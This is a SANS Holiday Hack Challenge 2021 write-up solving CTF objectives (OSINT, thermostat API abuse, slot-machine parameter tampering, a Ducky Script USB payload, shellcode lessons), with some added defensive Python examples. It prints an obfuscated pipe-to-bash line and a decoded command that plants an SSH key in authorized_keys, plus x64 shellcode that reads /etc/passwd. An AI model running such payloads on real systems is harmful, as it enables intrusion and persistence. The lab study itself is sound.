Objective and Terminal Assessment
Report
Author: Steven Maestas
Tuesday, December 21st, 2021
SANS HHC: Challenge and Terminal Assessment Report
Table of Contents
1 Summary.............................................................................................................................................................3
1.1 Executive Summary.....................................................................................................................................3
1.2 Assessment Summary..................................................................................................................................3
2 Objectives............................................................................................................................................................3
2.1 Objective 1 – Kringlecon Orientation..........................................................................................................3
2.2 Objective 2 – Where in the World is Caramel Santaigo?.............................................................................4
2.3 Objective 3 – Thaw Frost Tower’s Entrance................................................................................................7
2.4 Objective 4 – Slot Machine Investigation....................................................................................................9
2.5 Objective 5 – Strange USB Device............................................................................................................10
2.6 Objective 6 - Shellcode Primer..................................................................................................................11
2.7 Objective 7 – Printer Exploitation.............................................................................................................16
2.8 Objective 8 – Kerberoasting on an Open Fire............................................................................................18
2.9 Objective 9 – Splunk!................................................................................................................................24
2.10 Objective 10 – Now Hiring!....................................................................................................................26
2.11 Objective 11 – Customer Complaint Analysis..........................................................................................27
2.12 Objective 12 – Frost Tower Website Checkup.........................................................................................28
2.13 Objective 13 – FPGA Programming........................................................................................................30
2.14 End Game................................................................................................................................................31
3 Terminals...........................................................................................................................................................32
3.1 Exif Metadata............................................................................................................................................32
3.2 Grepping for Gold.....................................................................................................................................32
3.3 Logic Munchers.........................................................................................................................................33
3.4 IPv6 Sandbox.............................................................................................................................................34
3.5 Holiday Hero.............................................................................................................................................35
3.6 HoHo...No.................................................................................................................................................36
3.7 Yara Analysis.............................................................................................................................................38
3.8 IMDS Exploration.....................................................................................................................................40
3.9 Strace Ltrace Retrace.................................................................................................................................43
3.10 Elf Code Python.......................................................................................................................................44
3.11 Frost-o-Vator............................................................................................................................................49
4 Appendix A........................................................................................................................................................49
4.1 Bonus! Blue Log4Jack...............................................................................................................................49
4.2 Bonus! Red Log4Jack................................................................................................................................50
1 Summary
1.1 Executive Summary
The SANS Holiday Hack Challenge (HHC) is an annual, virtual security conference (Kringlecon) and CTF developed
by SANS, sponsored by Google and Splunk, and made available for free to anyone who has a web browser, an Internet
connection, and the desire to participate. This year’s HHC became available starting on December 9th, 2020. In addition
to offering this conference and CTF free of charge, SANS also allows participants to write a report on the challenges
(objectives and terminals) and submit that report for a chance to win a variety of prizes. This report has been
published as an entrant into that competition. The documentation contained herein relates directly to the solutions to
each challenge hosted and solved in the SANS 2021 HHC.
1.2 Assessment Summary
Documentation below relates directly to each challenge offered in the SANS 2021 HHC. The technical challenges are
split between objectives, the main challenges necessary to complete the CTF and the accompanying narrative, and
terminals, smaller challenges which are often meant to develop an initial skill set for the objectives or allow the
participant to earn hints that help them better understand the problems to be solved in the main objectives. This
year’s HHC consists of 13 objectives and 14 terminal challenges, adding up to a total of 27 individual technical
problems to be solved. This report details how every objective and terminal challenge was solved.
2 Objectives
2.1 Objective 1 – Kringlecon Orientation
Upon registering or logging in with an account registered in previous HHCs, the user is transported into a virtual
world. You begin with an onscreen avatar that you can move with the keyboard arrow keys or mouse, and you can
interact with NPCs in the game. Your avatar also has a badge in the center of the sprite which gives information such
as the currently unlocked narrative, list of objectives, hints, items, achievements, etc. Upon exploring this badge after
talking with the first NPC we encounter, we find our first objective. This year’s Kringlecon includes an orientation
challenge that walks you through the user interface.
No hints are given for this objective.
The following steps are required to complete this initial objective:
• 1a – Talk to Jingle Ringford
• 1b – Get your badge
• 1c – Get the wifi adapter
• 1d – Use the terminal
Objectives 1a and 1b will be completed as you talk to Jingle Ringford and he explains Kringlecon and the
functionality of the badge. As you continue to click on Jingle, an image of a wifi adapter will appear and you will have
to pick it up to complete Objective 1c.
After clicking the wifi adapter, you will move over and pick it up and Objective 1c will be marked as complete.
Jingle will also prompt you to talk to him again. When you click on him, a terminal will appear.
Click on the terminal and type answer in the top window of the terminal. Terminal challenges can be solved by
automatically completing the terminal challenge and having the code automatically register your completion or by
typing the correct keyword or phrase into the input window, as seen here.
Upon completing this terminal the gate to the rest of the CTF/Kringlecon will automatically open. In addition to
showing the objective as solved in the badge, we are also awarded our first two achievements, Kringlecon Tutorial and
Open the Gate.
2.2 Objective 2 – Where in the World is Caramel Santaigo?
The second objective is an OSINT challenge, where you must use the bits of information provided to determine the
final destination of a random elf and identify who that elf is, based on their personal characteristics and a built-in
search engine that lets you filter a list of elves by the characteristics you learn.
You can also gain additional hints by speaking with Piney Sappington in the courtyard. Hints are given after you
solve the Exif Metadata terminal located right beside Piney Sappington.
For reference, this is what the Objective 1 orientation terminal looked like once solved:
Enter the answer here
> answer
Welcome to the first terminal challenge!
This one is intentionally simple. All we need you to do is:
Click in the upper pane of this terminal
Type answer and press enter
elf@d242a1e59d58:~$
All hints for Objective 2 are listed below:
• Coordinate Systems – Don’t forget coordinate systems other than lat/long like MGRS and what3words.
• Flask Cookies – While Flask cookies can’t generally be forged without the secret, they can often be decoded
and read.
• OSINT – Clay Moody is giving a talk about OSINT techniques right now!
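The Flask cookie hint above rests on one fact: a Flask session cookie is signed, not encrypted, so its contents are readable by anyone holding it while changes are caught by the signature. The Python below is an added example (not from the report or the challenge) that builds a sample cookie in the Flask/itsdangerous layout, reads it with no secret at all, and checks its signature when the secret is known; the secret and the session contents are constructed.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Default salt Flask passes to itsdangerous' URLSafeTimedSerializer for sessions.
SALT = b"cookie-session"


def _b64d(s: str) -> bytes:
    """URL-safe Base64 decode, restoring the padding Flask strips."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64e(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_flask_session(cookie: str) -> dict:
    """Read the session contents with no secret at all.

    Layout: [.]payload.timestamp.signature; a leading '.' means the JSON
    payload was zlib-compressed before encoding. Nothing here is encrypted.
    """
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    raw = _b64d(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def _sign(value: bytes, secret: bytes) -> str:
    # itsdangerous 'hmac' key derivation: key = HMAC-SHA1(secret, salt)
    key = hmac.new(secret, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(key, value, hashlib.sha1).digest())


def verify_flask_session(cookie: str, secret: bytes) -> bool:
    """Integrity check only (no expiry handling): the signature covers payload.timestamp."""
    signed_value, _, sig = cookie.rpartition(".")
    return hmac.compare_digest(_sign(signed_value.encode(), secret), sig)


def make_flask_session(data: dict, secret: bytes, timestamp: int) -> str:
    """Build a cookie in the same layout; used here only to construct samples."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    packed = zlib.compress(raw)
    if len(packed) < len(raw) - 1:  # itsdangerous compresses only when it helps
        body = "." + _b64e(packed)
    else:
        body = _b64e(raw)
    ts = _b64e(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    signed_value = body + "." + ts
    return signed_value + "." + _sign(signed_value.encode(), secret)


# Constructed sample: a session for the elf-tracking game, signed with a demo secret.
DEMO_SECRET = b"constructed-demo-secret"
SAMPLE_COOKIE = make_flask_session(
    {"elf": "Noel Boetie", "stop": "Edinburgh"}, DEMO_SECRET, 1640044800)

if __name__ == "__main__":
    print(decode_flask_session(SAMPLE_COOKIE))
    print("valid:", verify_flask_session(SAMPLE_COOKIE, DEMO_SECRET))
    print("valid with wrong secret:", verify_flask_session(SAMPLE_COOKIE, b"guess"))
```

The defender's takeaway is that anything placed in a Flask session is visible to the client, so the cookie must never carry secrets or data the user should not see.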
Clicking on the terminal starts the OSINT challenge and presents us with the following instructions.
Welcome! In this game you will analyze clues and track an elf around the world. Put clues about your elf in your
InterRick portal. Depart by sleigh once you’ve figured out your next stop. Be sure to get there by Sunday, gumshoe.
Good luck!
Start Game!
As this investigation is randomized and there is potentially a lot of information to process, each clue, the tool used
to investigate it, and the resulting evidence are listed below in the order they were given for each location.
Start: Santa’s Castle
Investigate 1: I’ve heard that when British children put letters to Father Christmas in the fireplace, they magically end
up there!
Tool: Google
Evidence: https://santaclausvillage.info/santa-claus/santa-claus-main-post-office/ - Santa's Office is in Rovaniemi,
Finland, according to a Google search.
Investigate 2: They just contacted us from an address in the 80.95.128.0/20 range.
Tool: MaxMind GeoIP Database
Evidence: IP addresses in the 80.95.128.0/20 range are located in Finland according to MaxMind’s GeoIP database.
Investigate 3: They were dressed for -5.0 C and light snow conditions. The elf mentioned something about Stack
Overflow and Golang.
Tool: Interlink: Language Spoken: GoLang
Results: No results based on a single attribute
Location 1 – Rovaniemi, Finland.
Investigate 1: They said they wanted to visit Christmas markets – like Christkindlmarkt and Spittelberg, enjoy fried
sausages and goulash soup, and drink hot Christmas punch.
Tool: Google
Evidence: A search for Christkindlmarkt and Spittelberg brings up results for markets held in Vienna, Austria.
https://www.visitingvienna.com/sights/christmasmarkets/spittelberg/
Investigate 2: They just contacted us from an address in the 137.208.0.0/16 range.
Tool: MaxMind GeoIP Database
Evidence: IP addresses in the 137.208.0.0/16 range are located in Vienna, Austria according to MaxMind’s GeoIP
database.
Investigate 3: They were dressed for 2.0 C and fog conditions. The elf got really heated about using spaces for
indents.
Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces
Results: Jingle Ringford, Noel Boetie
Location 2 – Vienna, Austria
Investigate 1: I’m not sure what a hogmanay is, but that elf wants to experience one just after Christmas.
Tool: Google
Evidence: https://www.bbc.co.uk/newsround/38477036. Hogmanay is the Scottish name for New Year celebrations.
Investigate 2: They sent me this blurry selfie of themselves or someone they met:
Tool: Jimpl.com
Evidence: 142 m Above Sea Level, Lat: 55 deg 46’ 54.85” N Long: 3 deg 11’ 59.71” E, somewhere on the North Sea
between Denmark and England/United Kingdom and on the same latitude as Edinburgh, Scotland.
Investigate 3: They were dressed for 10.0 C and clear conditions. They kept checking their Discord app.
Tool: Interlink: Language Spoken: GoLang, Preferred indents: Spaces, Preferred social medium: Discord
Results: Noel Boetie
Location 3 – Edinburgh, Scotland.
Investigate 1: You just missed the elf!
Investigate 2: You’ve caught up to the elf in time! Do you know who you’ve caught? Elf: Noel Boetie
After traveling to each location by sleigh based on the analysis of the evidence, you must select the correct elf
based on their characteristics. In this game it was Noel Boetie. Upon selecting the correct elf, you receive the Where
in the World is Caramel Santiago? achievement.
2.3 Objective 3 – Thaw Frost Tower’s Entrance
The third objective is found in front of Frost Tower. The goal of this objective is to gain access to a thermostat via
Wi-Fi and use the command line to adjust the temperature and thaw the front door. Greasy GopherGuts in front of
Frost Tower gives you three hints without having to solve a terminal challenge.
The following information and hints regarding this objective are given:
• Linux Wi-Fi Commands – The iwlist and iwconfig utilities are key for managing Wi-Fi from the Linux
command line.
• Web Browsing with cURL – cURL makes HTTP requests from a terminal – in Mac, Linux, and modern
Windows!
• Adding Data to cURL requests – When sending a POST request with data, add --data-binary to your curl
command followed by the data you want to send.
The thermostat can be seen through the window next to the door. Getting as close as possible to the thermostat,
opening the Wi-Fi adapter interface, and running the following command shows us an open wireless network.
elf@d21a3aa6f958:~$ iwlist scanning
wlan0 Scan completed :
Cell 01 - Address: 02:4a:46:68:69:21
Frequency: 6.2 GHz (Channel 40)
Quality=48/70 Signal level=-62 dBm
Encryption key:off
Bit Rates: 400 Mb/s
ESSID:"FROST-Nidus-Setup"
We can connect to the wireless network using the following command. We also see that, upon connecting, we are
given the URL to the setup page for the thermostat.
elf@d21a3aa6f958:~$ iwconfig wlan0 essid "FROST-Nidus-Setup"
** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete
setup.
(The setup is comptaible with the 'curl' utility)
Running curl on http://nidus-setup:8080 gives us the following:
elf@d21a3aa6f958:~$ curl http://nidus-setup:8080
----------------------------------------------------------------------------
Nidus Thermostat Setup
----------------------------------------------------------------------------
WARNING Your Nidus Thermostat is not currently configured! Access to this
Device is restricted until you register your thermostat >> /register. Once you have completed
registration, the device will be fully activated.
In the meantime, Due to North Pole Health and Safety regulations
42 N.P.H.S 2600(h)(0) – frostbite proection, you may adjust the temperate.
API
The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc
Running curl on http://nidus-setup:8080/apidoc gives us the following manpage-style instructions on using the
thermostat API.
elf@d21a3aa6f958:~$ curl http://nidus-setup:8080/apidoc
----------------------------------------------------------------------------
Nidus Thermostat API
----------------------------------------------------------------------------
The API endpoints are accessed via:
http://nidus-setup:8080/api/<endpoint>
Utilize a GET request to query information; for example, you can check the temperatures set on your
cooler with:
curl -XGET http://nidus-setup:8080/api/cooler
Utilize a POST request with a JSON payload to configuration information; for example, you can change the
temperature on your cooler using:
curl -XPOST -H 'Content-Type: application/json' \
--data-binary '{"temperature": -40}' \
http://nidus-setup:8080/api/cooler
- Warning: DO NOT SET THE TEPERATURE ABOVE 0! That might melt important furniture
Available endpoints
------------------------------------------------------------
| Path | Available with registering?|
------------------------------------------------------------
| /api/cooler | Yes |
------------------------------------------------------------
| /api/host-ice-tank | No |
------------------------------------------------------------
...
Now we can set the temperature higher to melt the door using the following command.
elf@d21a3aa6f958:~$ curl -XPOST -H 'Content-Type: application/json' --data-binary '{"temperature": 100}' http://nidus-setup:8080/api/cooler
{
"temperature": 100.45,
"humidity": 68.89,
"wind": 5.3,
"windchill": 112.72,
"WARNING": "ICE METL DETECT!"
}
elf@d21a3aa6f958:~$
After running the previous command the doors will be thawed and we will now be able to access Frost Tower.
We will also get the achievement Thaw Frost Tower’s Entrance.
2.4 Objective 4 – Slot Machine Investigation
In this objective, we must play a slot machine game but manipulate it to accumulate a total of over 1,000 coins. Noel
Boetie in front of Santa’s Castle will give us two hints after solving the Logic Munchers terminal challenge.
The following information and hints regarding this objective are given:
• Parameter Tampering – It seems they’re susceptible to parameter tampering.
• Intercepting Proxies – Web application testers can use tools like Burp Suite or even right in the browser
with Firefox’s Edit and Resend feature.
When inspecting the web traffic between slots.jackfrosttower.com and your browser, you find the following POST
data is sent.
betamount=[num]&numline=[num]&cpl=[num]
When tampering with these parameters, we find that we can make the numline parameter negative, and the math on
the server side is done such that we are awarded a positive amount when we actually lose the spin. Using Burp
Repeater, we can keep sending requests with a negative numline in quick succession to keep winning until we get a
JSON response with the following values:
{
"success": true,
"data": {
"credit": 1038,
...
"response": "I'm going to have some bouncer trolls bounce you right out of this casino!"
},
"message": "Spin success"
}
Entering the text in the response attribute, “I’m going to have some bouncer trolls bounce you right out of this
casino!”, into the challenge textbox on your badge will solve the challenge and give you the Slot Machine Scrutiny
achievement.
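The server-side arithmetic behind this objective fits in a few lines, which makes the fix easy to see. The Python below is an added example, not the casino's code: the stake formula, the meaning of the betamount, numline and cpl fields from the POST body, and the house limits are assumed. It parses the request as sent, shows why a negative numline pays out on a losing spin, and places the validation beside it that a hardened handler needs.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SpinRequest:
    betamount: int   # coins wagered per line (meaning assumed)
    numline: int     # number of pay lines played (meaning assumed)
    cpl: int         # coins-per-line multiplier (meaning assumed)


class InvalidSpin(ValueError):
    """Raised by the hardened path when a request fails validation."""


MAX_BET = 100      # assumed house limits
MAX_LINES = 20


def parse_spin_form(body: str) -> SpinRequest:
    """Parse the POST body shape seen above: betamount=..&numline=..&cpl=.."""
    fields = dict(pair.split("=", 1) for pair in body.split("&"))
    return SpinRequest(int(fields["betamount"]), int(fields["numline"]), int(fields["cpl"]))


def settle_spin_vulnerable(credit: int, req: SpinRequest, payout_multiplier: int) -> int:
    """Assumed server arithmetic: deduct the stake, then pay stake * multiplier (0 on a loss).

    Nothing checks the sign of the inputs, so a negative numline makes the stake
    negative and "deducting" it on a losing spin adds coins instead.
    """
    stake = req.betamount * req.numline * req.cpl
    return credit - stake + stake * payout_multiplier


def validate_spin(req: SpinRequest, credit: int) -> int:
    """Reject anything outside the positive, bounded ranges; return the stake."""
    for name, value in (("betamount", req.betamount), ("numline", req.numline), ("cpl", req.cpl)):
        if value <= 0:
            raise InvalidSpin(f"{name} must be a positive integer, got {value}")
    if req.betamount > MAX_BET or req.numline > MAX_LINES:
        raise InvalidSpin("bet or line count exceeds house limits")
    stake = req.betamount * req.numline * req.cpl
    if stake > credit:
        raise InvalidSpin("insufficient credit for this stake")
    return stake


def settle_spin_hardened(credit: int, req: SpinRequest, payout_multiplier: int) -> int:
    """Same arithmetic, but only reachable with a validated, positive stake."""
    stake = validate_spin(req, credit)
    return credit - stake + stake * payout_multiplier


if __name__ == "__main__":
    tampered = parse_spin_form("betamount=10&numline=-10&cpl=1")  # constructed request
    print("vulnerable handler, losing spin:", settle_spin_vulnerable(500, tampered, 0))
    try:
        settle_spin_hardened(500, tampered, 0)
    except InvalidSpin as err:
        print("hardened handler:", err)
```

Logging every InvalidSpin rejection gives the casino a detection signal as well, since a legitimate client never sends a non-positive line count.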
2.5 Objective 5 – Strange USB Device
The goal of this objective is to reverse engineer a Ducky Script found on a USB device to figure out what keyboard
commands are being sent to the computer this device is attached to.
The following hints are given for this objective:
• Ducky Script – Ducky Script is the language for the USB Rubber Ducky.
• Duck Encoder – Attackers can encode Ducky Script using a duck encoder for delivery as inject.bin.
• MITRE ATT&CK and Ducky – The MITRE ATT&CK technique T1098.004 describes SSH persistence
techniques through authorized keys files.
• Ducky RE with Mallard – It’s also possible to reverse engineer encoded Ducky Script using Mallard.
The terminal greets us with the following:
A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in the /mnt/USBDEVICE.
We are given the location of a USB device at /mnt/USBDEVICE. On this USB device we find an encoded Ducky Script
named inject.bin. With the hint, we can decode the Ducky Script using the provided mallard.py Python tool.
Let’s decode this script and look for anything suspicious.
elf@36ac099f3f10:~$ ls /mnt/USBDEVICE
inject.bin
elf@36ac099f3f10:~$ ./mallard.py -f /mnt/USBDEVICE/inject.bin
...
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92... | rev | base64 -d | bash
ENTER
DELAY 600
...
The STRING line types a reversed Base64 blob and pipes it through rev and base64 -d into bash. Running the same
pipeline without the final bash stage reverses and Base64-decodes the blob so we can read the command the script
would have executed.
elf@36ac099f3f10:~$ echo
==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SC
hVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVd
GNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhk
U14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d
echo 'ssh-rsa
UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgb
m90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK
ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys
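As an added example (not part of the report or the challenge), the Python below reproduces that decoding step offline and without a shell: it finds echo ... | rev | base64 -d | bash STRING lines in a mallard-style listing, reverses and Base64-decodes the blob without executing anything, and flags any command that appends a key to authorized_keys (the T1098.004 persistence named in the hints). The Ducky listing, the stage-2 command and the key material are constructed; only the user@host comment matches the one found above.

```python
import base64
import re

# Constructed stage-2 command in the shape the report decoded: it appends a
# public key to authorized_keys. The key body is a placeholder, not a real key.
STAGE2 = ("echo 'ssh-rsa AAAAB3NzaC1yc2E_PLACEHOLDER_NOT_A_REAL_KEY "
          "ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys\n")


def stage_payload(cmd: str) -> str:
    """Obfuscate the way inject.bin did: Base64-encode, then reverse the text."""
    return base64.b64encode(cmd.encode())[::-1].decode()


# Constructed Ducky Script listing in the format mallard.py prints.
DUCKY_LISTING = "\n".join([
    "DELAY 1000",
    "STRING echo " + stage_payload(STAGE2) + " | rev | base64 -d | bash",
    "ENTER",
    "DELAY 600",
])

# A STRING line that types 'echo <blob> | rev | base64 -d | bash' (or sh).
PIPELINE = re.compile(
    r"^STRING\s+echo\s+(\S+)\s*\|\s*rev\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh\s*$")
AUTHORIZED_KEYS = re.compile(r">>\s*\S*\.ssh/authorized_keys")
SSH_KEY_COMMENT = re.compile(r"ssh-(?:rsa|ed25519|dss|ecdsa\S*)\s+\S+\s+([^\s'\"]+)")


def decode_staged_commands(listing: str) -> list[str]:
    """Reverse and Base64-decode each staged payload; nothing is executed."""
    decoded = []
    for line in listing.splitlines():
        m = PIPELINE.match(line.strip())
        if m:
            decoded.append(base64.b64decode(m.group(1)[::-1]).decode(errors="replace"))
    return decoded


def find_ssh_persistence(commands: list[str]) -> list[str]:
    """Return the key comment (user@host) of every key appended to authorized_keys."""
    hits = []
    for cmd in commands:
        if AUTHORIZED_KEYS.search(cmd):
            m = SSH_KEY_COMMENT.search(cmd)
            hits.append(m.group(1) if m else "<unparsed key>")
    return hits


if __name__ == "__main__":
    cmds = decode_staged_commands(DUCKY_LISTING)
    print("\n".join(cmds))
    print("authorized_keys persistence for:", find_ssh_persistence(cmds))
```

On a real host the same check belongs in the response playbook: diff ~/.ssh/authorized_keys for every user against a known-good copy and treat unexplained comments like this one as an indicator.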
We can see that the username associated with the SSH key installed onto this system is ickymcgoop. We can type this
into the answer window to solve.
What is the troll username involved with this attack?
> ickymcgoop
Your answer:
Checking…
Your answer is correct! Drat that Icky Mcgoop!
Entering the correct answer solves the objective and gives us the achievement Strange USB Device.
2.6 Objective 6 – Shellcode Primer
This sixth objective is a web-based application that walks you through the process of writing assembly language,
which is an important part of creating and understanding shellcode (hex-formatted machine code often used in
exploit programs and scripts). Hints will be given by Chimney Scissorsticks upon completing Santa’s Holiday Hero
(terminal) challenge.
The following hints are given for this challenge:
• Shellcode Primer Primer – If you run into any shellcode primers at the North Pole, be sure to read the
directions and the comments in the shellcode source!
• Debugging Shellcode – Also, troubleshooting shellcode can be difficult. Use the debugger step-by-step
feature to watch values.
• Register Stomping – Lastly, be careful not to overwrite any register values you need to reference later on in
your shellcode.
To solve this challenge, you need to solve each individual piece by inputting the correct assembly to do the task. Each
of the tasks is covered below: the primer’s own instructions, followed by the assembly that solves that step.
1. Introduction - Welcome to Shellcode Primer! The goal of Shellcode Primer is to teach you how to write some
basic x64 shellcode for reading a file. We'll take you through each piece of what you need, step by step, and show you
what's going on. First, let's learn the user interface a bit. There's some code below. The left is where you type code,
and the right will attempt to syntax-highlight and show build errors.
For the time being, you don't need to change anything, just have a look at what it's doing - it's more or less the same
type of stuff you're going to be learning. Go ahead and execute the code (using the button below) and play around in
the debugger. On the left, you'll see instructions executing in the order that they execute. Click on them to see the
state when that instruction executes! Also, don't forget to click that hint button below! Hints don't cost you anything. :)
No instructions necessary as the default code already solves this step.
2. Loops - Although you won't have to worry about writing a loop for any of these lessons, showing how a loop works
is a good demo for the debugger. Look at the code below, then execute it (no need to change it). Watch how the same
code repeats, over and over, with rax changing in each loop. Notice how the code listing below isn't the same as what
is executed in the debugger. In the History section of the debugger, the instructions will change to show what is
executed to achieve what you describe in the assembly source code.
No instructions necessary as the default code already solves this step.
3. Getting started – Welcome! Are you ready to learn how to write shellcode? We hope so! First, some tips:
• Comments are denoted with a semicolon (;)
• Don’t forget to look at the debugger, line by line, if something is wrong
• Really, don’t forget to read the error list! We check each place where you might go wrong in your code
• Your code for each level is saved in your browser, so you can leave and come back, refresh the page, and hop
back to previous levels to borrow code
This level currently fails to build because it has no code. Can you add a return statement at the end? Don’t worry
about what it’s actually returning (yet!)
; This is a comment! We'll use comments to help guide your journey.
; Right now, we just need to RETurn!
;
; Enter a return statement below and hit Execute to see what happens!
ret
4. Returning a Value – Now that we have an empty function, we can start building some code! Let’s learn what a
register is. A register is like a variable, except there are a small number of them – you have about eight general
purpose 64-bit integer registers on amd64 (we won’t talk about floating point or other special registers):
• rax
• rbx
• …
All mathy stuff that a computer does (add, subtract, xor, etc) operates on registers, not directly on memory. So they’re
super important! Specific registers have some implicit meaning, mostly by convention. For example, when a function
returns, its return value is typically put in rax. For this level, can you return the number ‘1337’ from your function?
; TODO: Set rax to 1337
mov rax, 1337
; Return, just like we did last time
ret
5. System Calls – If you’ve made it this far, I bet you’re wondering how to make your shellcode do something! If
you’re familiar with Python, you might know how to use the open() function. If you know C, you might know the
fopen() function. But what these and similar functions have in common is one thing: they’re library code. And
because shellcode needs to be self contained, we don’t have (easy) access to library code! So how do we deal with
that? Linux has something called a syscall, or system call. A syscall is a request that a program makes that asks Linux
– the kernel – to do something. And it turns out, at the end of the day, all of the library calls ultimately end with a
syscall. Here is a list of available syscalls on x64 (alternative). To perform a syscall:
• The number for the desired syscall is moved into rax
• The first parameter is moved into rdi, the second into rsi, and the third into rdx (there are others, but not many
syscalls need more than 3 parameters)
• Execute the syscall instruction
The second the syscall executes, Linux flips into kernel mode and we can no longer debug it. When it’s finished, it
returns the result in rax.
For this challenge we’re going to call sys_exit to exit the process with exit code 99. Can you prepare rax and rdi with
the correct values to exit? As always, feel free to mess around as much as you like!
; TODO: Find the syscall number for sys_exit and put it in rax
mov rax, 60
; TODO: Put the exit_code we want (99) in rdi
mov rdi, 99
; Perform the actual syscall
syscall
6. Calling Into the Void – Before we learn how to use Really Good syscalls, let’s try something fun: crash our
shellcode on purpose! You might think I’m mad, but there’s a method to my madness. Run the code below and watch
what happens! No need to modify it, unless you want to. :) Be sure to look at the debugger to see what’s going on!
Especially notice the top of the stack at the ret instruction.
No instructions necessary as the default code already solves this step.
7. Getting RIP – What happened in the last exercise? Why did it crash at 0x12345678? And did you notice the
0x12345678 was on top of the stack when ret happened? The short story is this: call pushes the return address onto
the stack, and ret jumps to it. Whaaat?? This is going to be long, but hopefully it will make it all clear! Let’s back up a
bit. At any given point, the instruction currently being executed is stored in a special register called the instruction
pointer (rip), which you may also hear called a program counter (pc). What is the rip value at the first line in our
code? Well, since we have a debugger, we know that it’s 0x1337000. But sometimes you don’t know and need to
find out. The most obvious answer is to treat it like a normal register, like this:
mov rax, rip
ret
Does that work? Nope! You can’t directly access rip. That means we need a trick! When you use call in x64, the
CPU doesn’t care where it’s calling, or whether there’s a ret waiting for it. The CPU assumes that, if the author put a
call in, there will naturally be a ret on the other end. Doing anything else would be just silly! So call pushes the
return address onto the stack before jumping into a function. When the function completes, the ret instruction uses the
return address on the stack to know where to return to. The CPU assumes that, sometime later, a ret will execute. The
ret assumes that at some point earlier a call happened, and that means that the top of the stack has the return address.
The ret will retrieve the return address off the top of the stack (using pop) and jump to it. Of course, we can execute
pop too! If we pop the return address off the stack, instead of jumping to it, the address goes into a register. Hmm.
Does that also sound like mov REG,ip to you? For this exercise, can you pop the address after the call – the No Op
(nop) instruction – into rax, then return?
; Remember, this call pushes the return address to the stack
call place_below_the_nop
; This is where the function *thinks* it is supposed to return
nop
; This is a 'label' - as far as the call knows, this is the start of a function
place_below_the_nop:
; TODO: Pop the top of the stack into rax
pop rax
; Return from our code, as in previous levels
ret
8. Hello, World! - So remember how last level, we got the address of nop and returned it? Did you see that nop
execute? Nope! We jumped right over it, but stored its address en-route. What can we do by knowing our own
address? Well, since shellcode is, by definition, self-contained, you can do other fun stuff like include data alongside
the code! What if the return address isn’t an instruction at all, but a string? For this next exercise, we include a
plaintext string – ‘Hello World!’ - as part of the code. It’s just sitting there in memory. If you look at the compiled
code, it’s all basically Hello World, which doesn’t run. Instead of trying to run it, can you call past it, and pop its
address into rax? Don’t forget to check the debugger after to see it in rax!
; This would be a good place for a call
call lblhello
; This is the literal string 'Hello World', null terminated, as code. Except
; it'll crash if it actually tries to run, so we'd better jump over it!
db 'Hello World',0
; This would be a good place for a label and a pop
lblhello:
pop rax
; This would be a good place for a re... oh wait, it's already here. Hooray!
ret
9. Hello World!! - Remember syscalls? Earlier, we used them to call an exit. Now let’s try another! This time,
instead of getting a pointer to the string Hello World, we’re going to print it to standard output (stdout). Have another
look at the syscall table. Can you find sys_write, and use it to print the string Hello World! to stdout? Note: stdout’s
file descriptor is 1.
; TODO: Get a reference to this string into the correct register
call below_string
db 'Hello World!',0
below_string:
; Set up a call to sys_write
; TODO: Set rax to the correct syscall number for sys_write
mov rax, 1
; TODO: Set rdi to the first argument (the file descriptor, 1)
mov rdi, 1
; TODO: Set rsi to the second argument (buf - this is the "Hello World" string)
pop rsi
; TODO: Set rdx to the third argument (length of the string, in bytes)
mov rdx,12
; Perform the syscall
syscall
; Return cleanly
mov rax,0
ret
10. Opening a File – We’re getting dangerously close to doing something interesting! How about that? Can you use
the sys_open syscall to open /etc/password, then return the file handle (in rax)? Have another look at the syscall table.
Can you call sys_open on the file /etc/password, then return the file handle? Here’s the syscall table again.
11. Reading a File – Do you feel ready to write some useful code? We hope so! You're mostly on your own this
time! Don't forget that you can reference your solutions from other levels! For this exercise, we're going to read a
specific file...let's say, /var/northpolesecrets.txt...and write it to stdout. No reason for the name, but since this is Jack
Frost's troll-trainer, it might be related to a top-secret mission! Solving this is going to require three syscalls! Four if
you decide to use sys_exit – you're welcome to return or exit, just don't forget to fix the stack if you return! First up,
just like last exercise, call sys_open. This time, be sure to open /var/northpolesecrets.txt. Second, find the sys_read
entry on the syscall table, and set up the call. Some tips:
1. The file descriptor is returned by sys_open
2. The buffer for reading the file can be any writeable memory – rsp is a great option; temporary storage is what the
stack is meant for
3. You can experiment to find the right count, but if it's a bit too high, that's perfectly fine
Third, set up the sys_write call:
